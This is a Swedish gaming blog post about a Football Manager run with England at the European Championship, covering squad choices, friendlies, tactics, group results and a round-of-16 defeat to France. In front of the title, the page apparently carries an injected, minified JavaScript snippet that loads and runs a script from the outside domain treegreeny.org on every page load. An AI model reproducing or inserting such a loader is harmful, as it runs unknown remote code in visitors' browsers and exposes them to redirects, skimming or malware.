;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Start of the week – Its coming home? – FMSweden
Meny Stäng

Start of the week – Its coming home?

EM står runt hörnet och det är från dem brittiska öarna jag helst konsumerar min fotboll ifrån och därför kommer jag nu 3 måndagar i rad spela en EM-turnering med 3 olika länder. (England, Skottland och Wales). Först ut är England.

Trupp

Detta blev min 23-manna trupp. I efterhand skulle jag valt fler offensiva spelare och möjligen en mer offensiv formation också. Kaptener blev Harry Kane och Jordan Henderson

Genrepen

Två matcher som innebar mycket speltid på samtliga spelare. En stor ruljans som gjorde att alla fick chansen att spela till sig en plats till EM premiären. Resultatmässigt slog vi Frankrike med 2-0 inför 90.000 på Wembley efter mål av Raheem Sterling och Jordan Henderson och sen torskade vi borta mot Turkiet med 2-1 efter ett sent avgörande. Vårt mål gjordes av Phil Foden i den matchen.

Taktik

Genrepen ledde mig fram till denna elva i premiären mot Schweiz. Denna gång med England blev det ganska stor ruljans på manskapet under mästerskapet eftersom det finns så mycket kvalité. Med Wales och Skottland kommer det bli en tydligare elva men detta var laget som ställdes på benen i premiären. Trots en trupp som var full av mittfältare fick Trent en plats på mittfältet eftersom jag ville ha Wan-Bissakas defensiva kvalitéer på planen.

Gruppspel 

Vi hamnade i en tämligen enkel grupp där vi var stora favoriter att vinna gruppen.

England – Schweiz 1-1
En match vi alla dagar ska vinna. Harry Maguire gjorde 1-0 i minut 66’ och i den 94:e minuten på en hörna nickade Embol0 in 1-1 på Schweiz andra skott på mål i matchen.

Georgien – England 0–3
En perfekt insats på alla sätt. Sancho petades och Grealish fick chansen. Han tackade för förtroendet med 2 strutar.

England – Ukraina 3-0
4 skott, 3 mål. Effektivt och Kane vaknade med 2 mål. Tyvärr skadad i matchens slutskede och missar resten av turneringen.

En gruppseger där vi satte det firandet i halsen eftersom Frankrike kommit 2:a i sin grupp och det innebar att regerande världsmästarna väntade i åttondelsfinal.

Åttondelsfinal
Frankrike – England 1-0 ET
En tuff lottning och en match där avsaknaden av Harry Kane blev för stor. Många fina lägen att avgöra men DCL som gjorde sina första minutrar i mästerskapet var inte redo att axla Kanes mantel. Ett fiasko på alla sätt.

Bästa spelare: Harry Kane 3+1

En åttondelsfinal blir en måttstock som jag vill överträffa med både Wales och Skottland.

Please wait...

Liknande Inlägg

4 kommentarer

Lämna ett svar